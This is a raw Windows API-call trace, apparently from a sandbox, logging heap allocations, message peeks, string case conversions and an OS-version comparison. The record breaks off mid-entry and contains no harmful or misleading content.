[0200.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0200.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0200.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.524] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0200.524] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0200.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0200.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0200.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0200.525] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.525] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0200.526] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0200.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.527] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0200.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0200.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.527] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0200.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0200.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.529] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0200.529] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d98 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0200.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0200.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.531] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.531] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0200.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c90 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.531] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0200.532] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0200.532] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.532] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0200.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0200.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0200.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0200.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0200.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0200.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0200.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0200.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0200.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0200.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0200.535] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.536] HeapFree (in: 